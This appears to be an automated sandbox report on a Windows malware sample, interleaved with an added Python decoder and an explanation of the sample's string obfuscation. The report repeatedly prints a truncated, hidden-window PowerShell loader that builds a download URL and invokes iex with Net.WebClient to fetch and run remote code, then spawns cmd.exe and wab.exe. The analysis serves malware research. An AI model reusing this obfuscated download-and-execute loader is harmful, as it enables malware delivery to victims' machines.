Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Elektroencefalograms = 1;$Unvacuously='Sub';$Unvacuously+='strin';$Unvacuously+='g';Function Afvarslingerne($corrodentia){$Skrivepapiret=$corrodentia.Length-$Elektroencefalograms;For($Parliaments178=5;$Parliaments178 -lt $Skrivepapiret;$Parliaments178+=6){$Mellemvejs+=$corrodentia.$Unvacuously.Invoke( $Parliaments178, $Elektroencefalograms);}$Mellemvejs;}function Delhed($Jambos){. ($Syresaltet254) ($Jambos);}$Fertilizing=Afvarslingerne 'KodifM BundoGangszAffeciM.gnel KvinlBeboeaI ter/Cata 5M,del.Uddat0.orur Wi.d(TilbaW,eganiDa sonDeprid Bag,o,aubewThermsTildm EkspaN AldeT Mim. pejls1Kopi.0Mmesl. Dia.0 ubb;Sl,mb Fami.WSprogiKurvenV,sos6Rema 4Entsv; onse Tarahx Bo.u6Kaval4 A,ls; tomk Cig.rr appev Satd:Anthr1Udmal2.ipho1Mis,a. Sed.0Sedat),uder Prov.Gdemile StercKopibkOversoU ykk/ F gh2Gutta0 Samm1Fl nc0Grund0skovs1nikke0Srpr,1Rubri Hov.dFParahiRimelr CamoedottofUlceroStrudxKreop/N.rco1Okap,2Klyng1Refrn.U,elv0Amula ';$Deniably=Afvarslingerne 'S.zinUPraissKittee,azumrUnder-WittyASadd,gNick eHyposnF,nget C nd ';$Generaene=Afvarslingerne 'Ra,cehmanubtConvatRainwpStddmsHenre:Garro/kn.ge/kerbew HabiwAcylawV.rso.Colons HumbeRebelnKonsodMungcsTranspSten,aBoaercChomse R in.CreencDi,tooB.ctemmili./ IntrpAdaylrpot.co Dip,/ enlsdVandclCopyi/OvertuHyn.eqBruti2phasc1EndostEmbry8Dokst ';$Barks=Afvarslingerne ' Lini>Kalku ';$Syresaltet254=Afvarslingerne 'SkoldiNeshleN.umexKla p ';$Stereomusik='Goldede';$Tohaandsbetjening = Afvarslingerne 'Klu peRv.dicrejsehMultio Pr,e samme% Ennoa ennepFr.udpPlanedHor eaMooratWhinnaZyzzy%Bge,g\Val dBt.ftsrRegi,iGrkerdRevolgUds.uePaschwArcosaCh orrInstrd Rej s Opin.SpotlHunbrua SegmlWarmu Sylle&Klosr&Trinu Fng.eHalfscBaterhCentro nfre BunsetKono, ';Delhed (Afvarslingerne 'An ui$ Sjl.gTil.vlC.oiroGelo,b linda 
IsaclTeleu:RetsvMPrvkebKnyeneBededlPulv,fOttomaSan,ob Halsrkasini ,ermkledsaaLe.bonPredetdaa.y=Ottin(regracRaggemTragadSni,f Dioe/P onec uth Kono$IndehTAfsvaoPterihDechiaVantaaCopian,malgd A stsBaut,bSh,rteBooketrgre,jAfdeleraspenaktiviMetabnLizarg cal )Sagog ');Delhed (Afvarslingerne 'T,ang$IsvafgOptimlForlao eetsb.uperaMellelIntro:Gal eU ReobnS.edemNavleoUnconn,aabeo,kadepMask ophilalitlliiAd erzNonnei Maninunmo,g Quil=afske$S vsnGShutte Pretn ileeUn apr Cumaa SpageI,ettnKandieKan,i.heptasMisrepVe,trl DagtiOxalatPho o( Road$ SaltBZoodeaTeutorSatsek TabusUnhos) Nond ');$Generaene=$Unmonopolizing[0];$Lommen= (Afvarslingerne ' arti$ Pre.g Lystl Sp,doDime,b SpilaGlatblcys,o:FamilGBaksglkate uSuantmMisreeHomotlI,proiVandlk HenpeTapet=To efNWinkeeSpearwStolt-DyresO stenbGadedjSogneeCamemcMounttDek t RibstSMineryUn.ros Showtbassee VirgmFili,. NonpNIndp eE,strt Impe.slap.WH.ldeeTreckbSti,lCly kelNykalinona,eRosennBangst');$Lommen+=$Mbelfabrikant[1];Delhed ($Lommen);Delhed (Afvarslingerne ',verc$A,rhuG,affllalpinuHannem ind,eskattlJustii DatakB,rfoeCorus.Stin.HHage eCassiaJointd nitheklunsr UnmesSkand[ Ove Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bridgewards.Hal && echo t" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
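Every string literal in the PowerShell stage recorded above is hidden behind the same routine: Afvarslingerne walks the literal from offset 5 in steps of 6 and keeps one character per step, stopping one short of the end (the method name is assembled as 'Sub'+'strin'+'g' and called through .Invoke so the word Substring never appears in the script, and the result is handed to $Syresaltet254, which itself decodes to iex). The decoder below is an added example, not code from the report or from the sample; the literals it decodes are copied verbatim from the command line as rendered on this page. One caveat a practitioner will hit: the report is HTML, so runs of spaces inside the filler were collapsed, and a literal that lost a double space decodes correctly only up to that point. The length check flags those cases; the $Tohaandsbetjening literal is included to show it, and the report itself records the true result of that one in the cmd.exe child process ("echo %appdata%\Bridgewards.Hal && echo t"). Decode from the raw kam.cmd rather than from a rendered report when the output matters.

```python
"""Decoder for the string obfuscation used by the PowerShell stage above.

Added example, not code from the report or from the sample. The function
Afvarslingerne in the recorded command line keeps one character out of every
six, starting at offset 5 and stopping one short of the end of the string:

    $Skrivepapiret = $corrodentia.Length - 1          # $Elektroencefalograms = 1
    For ($i = 5; $i -lt $Skrivepapiret; $i += 6) {
        $out += $corrodentia.Substring($i, 1)         # 'Sub'+'strin'+'g' via .Invoke
    }

decode() mirrors that loop. The literals in SAMPLES are copied verbatim from
the command line as rendered on this page (variable names as in the script).
"""
from __future__ import annotations

STEP = 6    # each chunk: 5 filler characters followed by 1 payload character
START = 5   # index of the first payload character


def decode(blob: str, start: int = START, step: int = STEP) -> str:
    """Return blob[start], blob[start+step], ... for every index strictly
    below len(blob) - 1, exactly as the loader's loop does."""
    return "".join(blob[i] for i in range(start, len(blob) - 1, step))


def is_clean(blob: str, step: int = STEP) -> bool:
    """Well-formed input is a whole number of 6-character chunks; the last
    chunk is a 5-character tail plus a trailing space the loop never reads.
    An HTML-rendered copy of the script has collapsed runs of spaces, which
    shortens some literals, so a length that is not a multiple of 6 means
    the decoded text is only trustworthy up to the damage point."""
    return len(blob) % step == 0


SAMPLES = {
    "Deniably": r"S.zinUPraissKittee,azumrUnder-WittyASadd,gNick eHyposnF,nget C nd ",
    "Generaene": r"Ra,cehmanubtConvatRainwpStddmsHenre:Garro/kn.ge/kerbew HabiwAcylawV.rso.Colons HumbeRebelnKonsodMungcsTranspSten,aBoaercChomse R in.CreencDi,tooB.ctemmili./ IntrpAdaylrpot.co Dip,/ enlsdVandclCopyi/OvertuHyn.eqBruti2phasc1EndostEmbry8Dokst ",
    "Barks": r" Lini>Kalku ",
    "Syresaltet254": r"SkoldiNeshleN.umexKla p ",
    # As rendered on this page one double space inside the filler was lost,
    # so the tail decodes to junk; the report records the real command in the
    # cmd.exe child: /c "echo %appdata%\Bridgewards.Hal && echo t".
    "Tohaandsbetjening": r"Klu peRv.dicrejsehMultio Pr,e samme% Ennoa ennepFr.udpPlanedHor eaMooratWhinnaZyzzy%Bge,g\Val dBt.ftsrRegi,iGrkerdRevolgUds.uePaschwArcosaCh orrInstrd Rej s Opin.SpotlHunbrua SegmlWarmu Sylle&Klosr&Trinu Fng.eHalfscBaterhCentro nfre BunsetKono, ",
}


def decode_all(samples: dict[str, str] = SAMPLES) -> dict[str, tuple[str, bool]]:
    """Decode every literal and pair it with the is_clean() verdict."""
    return {name: (decode(blob), is_clean(blob)) for name, blob in samples.items()}


if __name__ == "__main__":
    for name, (text, clean) in decode_all().items():
        print(f"{name:18} {'ok ' if clean else 'DMG'} {text!r}")
```

Run as-is, the clean literals give the header name User-Agent ($Deniably), the iex alias ($Syresaltet254), the ">" separator ($Barks) and the download URL held in $Generaene; $Tohaandsbetjening is reported as damaged and its decoded text matches the recorded cmd.exe command line only up to the "&&". The same decode() applies to every other literal in the script once it is taken from the raw sample.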
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$elektroencefalograms = 1;$unvacuously='sub';$unvacuously+='strin';$unvacuously+='g';function afvarslingerne($corrodentia){$skrivepapiret=$corrodentia.length-$elektroencefalograms;for($parliaments178=5;$parliaments178 -lt $skrivepapiret;$parliaments178+=6){$mellemvejs+=$corrodentia.$unvacuously.invoke( $parliaments178, $elektroencefalograms);}$mellemvejs;}function delhed($jambos){. ($syresaltet254) ($jambos);}$fertilizing=afvarslingerne 'kodifm bundogangszaffecim.gnel kvinlbeboeai ter/cata 5m,del.uddat0.orur wi.d(tilbaw,eganida sondeprid bag,o,aubewthermstildm ekspan aldet mim. pejls1kopi.0mmesl. dia.0 ubb;sl,mb fami.wsprogikurvenv,sos6rema 4entsv; onse tarahx bo.u6kaval4 a,ls; tomk cig.rr appev satd:anthr1udmal2.ipho1mis,a. sed.0sedat),uder prov.gdemile sterckopibkoversou ykk/ f gh2gutta0 samm1fl nc0grund0skovs1nikke0srpr,1rubri hov.dfparahirimelr camoedottofulcerostrudxkreop/n.rco1okap,2klyng1refrn.u,elv0amula ';$deniably=afvarslingerne 's.zinupraisskittee,azumrunder-wittyasadd,gnick ehyposnf,nget c nd ';$generaene=afvarslingerne 'ra,cehmanubtconvatrainwpstddmshenre:garro/kn.ge/kerbew habiwacylawv.rso.colons humberebelnkonsodmungcstranspsten,aboaercchomse r in.creencdi,toob.ctemmili./ intrpadaylrpot.co dip,/ enlsdvandclcopyi/overtuhyn.eqbruti2phasc1endostembry8dokst ';$barks=afvarslingerne ' lini>kalku ';$syresaltet254=afvarslingerne 'skoldineshlen.umexkla p ';$stereomusik='goldede';$tohaandsbetjening = afvarslingerne 'klu perv.dicrejsehmultio pr,e samme% ennoa ennepfr.udpplanedhor eamooratwhinnazyzzy%bge,g\val dbt.ftsrregi,igrkerdrevolguds.uepaschwarcosach orrinstrd rej s opin.spotlhunbrua segmlwarmu sylle&klosr&trinu fng.ehalfscbaterhcentro nfre bunsetkono, ';delhed (afvarslingerne 'an ui$ sjl.gtil.vlc.oirogelo,b linda isaclteleu:retsvmprvkebknyenebededlpulv,fottomasan,ob halsrkasini 
,ermkledsaale.bonpredetdaa.y=ottin(regracraggemtragadsni,f dioe/p onec uth kono$indehtafsvaopterihdechiavantaacopian,malgd a stsbaut,bsh,rtebooketrgre,jafdeleraspenaktivimetabnlizarg cal )sagog ');delhed (afvarslingerne 't,ang$isvafgoptimlforlao eetsb.uperamellelintro:gal eu reobns.edemnavleounconn,aabeo,kadepmask ophilalitlliiad erznonnei maninunmo,g quil=afske$s vsngshutte pretn ileeun apr cumaa spagei,ettnkandiekan,i.heptasmisrepve,trl dagtioxalatpho o( road$ saltbzoodeateutorsatsek tabusunhos) nond ');$generaene=$unmonopolizing[0];$lommen= (afvarslingerne ' arti$ pre.g lystl sp,dodime,b spilaglatblcys,o:familgbaksglkate usuantmmisreehomotli,proivandlk henpetapet=to efnwinkeespearwstolt-dyreso stenbgadedjsogneecamemcmounttdek t ribstsmineryun.ros showtbassee virgmfili,. nonpnindp ee,strt impe.slap.wh.ldeetreckbsti,lcly kelnykalinona,erosennbangst');$lommen+=$mbelfabrikant[1];delhed ($lommen);delhed (afvarslingerne ',verc$a,rhug,affllalpinuhannem ind,eskattljustii datakb,rfoecorus.stin.hhage ecassiajointd nitheklunsr unmesskand[ over$ar.ehdskr.de job nab.m
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$elektroencefalograms = 1;$unvacuously='sub';$unvacuously+='strin';$unvacuously+='g';function afvarslingerne($corrodentia){$skrivepapiret=$corrodentia.length-$elektroencefalograms;for($parliaments178=5;$parliaments178 -lt $skrivepapiret;$parliaments178+=6){$mellemvejs+=$corrodentia.$unvacuously.invoke( $parliaments178, $elektroencefalograms);}$mellemvejs;}function delhed($jambos){. ($syresaltet254) ($jambos);}$fertilizing=afvarslingerne 'kodifm bundogangszaffecim.gnel kvinlbeboeai ter/cata 5m,del.uddat0.orur wi.d(tilbaw,eganida sondeprid bag,o,aubewthermstildm ekspan aldet mim. pejls1kopi.0mmesl. dia.0 ubb;sl,mb fami.wsprogikurvenv,sos6rema 4entsv; onse tarahx bo.u6kaval4 a,ls; tomk cig.rr appev satd:anthr1udmal2.ipho1mis,a. sed.0sedat),uder prov.gdemile sterckopibkoversou ykk/ f gh2gutta0 samm1fl nc0grund0skovs1nikke0srpr,1rubri hov.dfparahirimelr camoedottofulcerostrudxkreop/n.rco1okap,2klyng1refrn.u,elv0amula ';$deniably=afvarslingerne 's.zinupraisskittee,azumrunder-wittyasadd,gnick ehyposnf,nget c nd ';$generaene=afvarslingerne 'ra,cehmanubtconvatrainwpstddmshenre:garro/kn.ge/kerbew habiwacylawv.rso.colons humberebelnkonsodmungcstranspsten,aboaercchomse r in.creencdi,toob.ctemmili./ intrpadaylrpot.co dip,/ enlsdvandclcopyi/overtuhyn.eqbruti2phasc1endostembry8dokst ';$barks=afvarslingerne ' lini>kalku ';$syresaltet254=afvarslingerne 'skoldineshlen.umexkla p ';$stereomusik='goldede';$tohaandsbetjening = afvarslingerne 'klu perv.dicrejsehmultio pr,e samme% ennoa ennepfr.udpplanedhor eamooratwhinnazyzzy%bge,g\val dbt.ftsrregi,igrkerdrevolguds.uepaschwarcosach orrinstrd rej s opin.spotlhunbrua segmlwarmu sylle&klosr&trinu fng.ehalfscbaterhcentro nfre bunsetkono, ';delhed (afvarslingerne 'an ui$ sjl.gtil.vlc.oirogelo,b linda 
isaclteleu:retsvmprvkebknyenebededlpulv,fottomasan,ob halsrkasini ,ermkledsaale.bonpredetdaa.y=ottin(regracraggemtragadsni,f dioe/p onec uth kono$indehtafsvaopterihdechiavantaacopian,malgd a stsbaut,bsh,rtebooketrgre,jafdeleraspenaktivimetabnlizarg cal )sagog ');delhed (afvarslingerne 't,ang$isvafgoptimlforlao eetsb.uperamellelintro:gal eu reobns.edemnavleounconn,aabeo,kadepmask ophilalitlliiad erznonnei maninunmo,g quil=afske$s vsngshutte pretn ileeun apr cumaa spagei,ettnkandiekan,i.heptasmisrepve,trl dagtioxalatpho o( road$ saltbzoodeateutorsatsek tabusunhos) nond ');$generaene=$unmonopolizing[0];$lommen= (afvarslingerne ' arti$ pre.g lystl sp,dodime,b spilaglatblcys,o:familgbaksglkate usuantmmisreehomotli,proivandlk henpetapet=to efnwinkeespearwstolt-dyreso stenbgadedjsogneecamemcmounttdek t ribstsmineryun.ros showtbassee virgmfili,. nonpnindp ee,strt impe.slap.wh.ldeetreckbsti,lcly kelnykalinona,erosennbangst');$lommen+=$mbelfabrikant[1];delhed ($lommen);delhed (afvarslingerne ',verc$a,rhug,affllalpinuhannem ind,eskattljustii datakb,rfoecorus.stin.hhage ecassiajointd nitheklunsr unmesskand[ ove
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation